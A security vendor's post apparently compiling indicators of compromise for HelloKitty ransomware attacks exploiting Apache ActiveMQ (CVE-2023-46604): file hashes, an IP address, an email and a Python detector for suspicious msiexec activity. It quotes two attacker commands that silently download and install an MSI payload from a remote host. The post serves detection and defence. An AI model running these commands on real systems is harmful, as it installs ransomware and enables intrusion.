CVE-2023-46604: Apache ActiveMQ IoCs

In our weekly vulnerability summary, we touched on the exploitation of Apache ActiveMQ via an insecure object deserialization vulnerability. We have compiled the IoCs published by the FBI (full report), the German CSIRT, and the NCSC so you can determine whether you have been targeted by the HelloKitty ransomware (aka FiveHands).

File Hashes (SHA-256):

  • Rclone.exe 53ae3567a34097f29011d752f1d3afab8f92beb36a8d6a5df5c1d4b12edc1703

  • Mimikatz.exe 3e02e94e3ecb5d77415c25ee7ecece24953b4d7bd21bf9f9e3413ffbdad472d2

  • Advanced_IP_Scanner_2.5.3850.exe 87bfb05057f215659cc801750118900145f8a22fa93ac4c6e1bfd81aa98b0a55

  • Netscan.exe a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789

  • RouterScan.exe 18229920a45130f00539405fecab500d8010ef93856e1c5bcabf5aa5532b3311

  • MEGAClient.exe 9a4acb3112a52fcc58b221b12fa5e90f068247ac3f8990ff2b4bf7e20ed5b4e1

  • pCloud.exe 6ce1ab4f45c78a102197258acd2da446902dad2031825c93d875660c90df27c4

  • psexec.c 3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

  • PAExec.exe 19ce4f92e7a7b1a812ee2efa834733279ddf1052e123cf36bb77443197a0ed5f

  • my15.ps1 (Warprism) 3b90d9fad35a45a738c6b2830896168c99014474de17984411be61b25acf6db5

  • grabff.exe 7d57e0ba8b36ec221b16807ce4e13a1125d53922fa50c3827a5ebd6811736ffd

  • grbachrome.exe 374a98a083fc04f30b86718a9fe7a5a61d1afc22b93222a89d2b752b5da1df7e

  • spoolsv.exe 88a2d5cbb7ae903f8208b4a831e8ca6fb5ccb6717d4ea158ce792436aa2b9a4d

  • 9e63911b5b7e63023708125418d6d4d5.virus 59f5320b70ef8c51be409aec486366c76f6dff2730b0ab227ffd1607a4ba9b54

  • rfusclient.exe a9226978b33d0bca5b6a216b98dc25558458c28fea11d1ffc650cab1527dc5d0

  • s3browser-9-5-3.exe 5f312e137beb1ce75f8fdf03a59e1b3cba3dc57ccc16e48daee3ee52c08fa149

  • SombRAT (multiple Hashes):

  • ionline.exe 02a08b994265901a649f1bcf6772bc06df2eb51eb09906af9fd0f4a8103e9851

  • f568229e696c0e82abb35ec73d162d5e.virus c2498845ed4b287fd0f95528926c8ee620ef0cbb5b27865b2007d6379ffe4323

  • HelloKitty files (multiple hashes for .bin files):

  • servmanger.exe 7be901c5f7ffeb8f99e4f5813c259d0227335680380ed06df03fb836a041cb06

  • Hi_Kitty_2.exe 501487b025f25ddf1ca32deb57a2b4db43ccf6635c1edc74b9cff54ce0e5bcfe

  • ag.exe 9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0

  • Outlook.exe e94064401b54c399d3f844fdf08f880cb8c5d74c34de9dc28733dd22dabba678

  • M2.msi 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4

  • M4.msi 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0

  • dllloader c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7

  • EncDll 3e65437f910f1f4e93809b81c19942ef74aa250ae228caca0b278fc523ad47c5

Malicious Actions:

  • Java.exe will contain the version of ActiveMQ being targeted.

  • Remote binaries M2.png and M4.png were loaded using MSIExec.

  • Malicious .NET executables named dllloader and EncDll run, encrypting files with the “.locked” extension.

IP Addresses:

  • 172.245.16[.]125

Email Addresses:

  • service@hellokittycat[.]online

Command Executions:

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"
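The command lines above share one pattern: msiexec run quietly (/q) with an install (/i) source that is an http URL on the known IoC host, serving an MSI disguised as a .png. The detector below, an added example and not part of the original post, refangs the page's defanged indicators and runs that check over constructed process-creation log lines; the log format and the parent= field are assumptions.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Indicator from this page; refanged here so it matches live telemetry.
IOC_HOSTS = {"172.245.16.125"}

# msiexec with any flags (/q etc.) before /i and an http(s) install source.
MSIEXEC_REMOTE = re.compile(
    r"msiexec(?:\.exe)?\s+(?P<flags>(?:/\w+\s+)*)/i\s+(?P<url>https?://[^\s\"']+)",
    re.IGNORECASE,
)


def refang(text: str) -> str:
    """Turn defanged indicators (hxxp, [.]) back into their live form for matching."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def analyze_command(cmdline: str) -> Optional[Dict[str, object]]:
    """Return detection details if cmdline is a remote msiexec install, else None."""
    m = MSIEXEC_REMOTE.search(refang(cmdline))
    if not m:
        return None
    parsed = urlparse(m.group("url"))
    return {
        "url": m.group("url"),
        "host": parsed.hostname,
        "quiet": "/q" in m.group("flags").lower().split(),
        "known_ioc_host": parsed.hostname in IOC_HOSTS,
        # The observed payloads were MSIs served as .png: a non-.msi path is a disguise signal.
        "disguised": not parsed.path.lower().endswith(".msi"),
    }


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Flag remote msiexec installs that are quiet, disguised, or from a known IoC host."""
    hits = []
    for line in lines:
        info = analyze_command(line)
        if info and (info["known_ioc_host"] or info["disguised"] or info["quiet"]):
            hits.append(info)
    return hits


# Constructed sample process-creation log lines (not real telemetry); assumed format.
SAMPLE_LOG = [
    'parent=java.exe cmd=cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"',
    'parent=java.exe cmd=cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"',
    'parent=explorer.exe cmd=msiexec.exe /i C:\\Users\\admin\\Downloads\\7zip.msi',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A local install from disk (third sample line) produces no hit, so the rule keys on the remote-source pattern rather than on msiexec itself.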

If you aren’t sure where your risk lies, see how Glassportal can help you: demo@glassportal.io
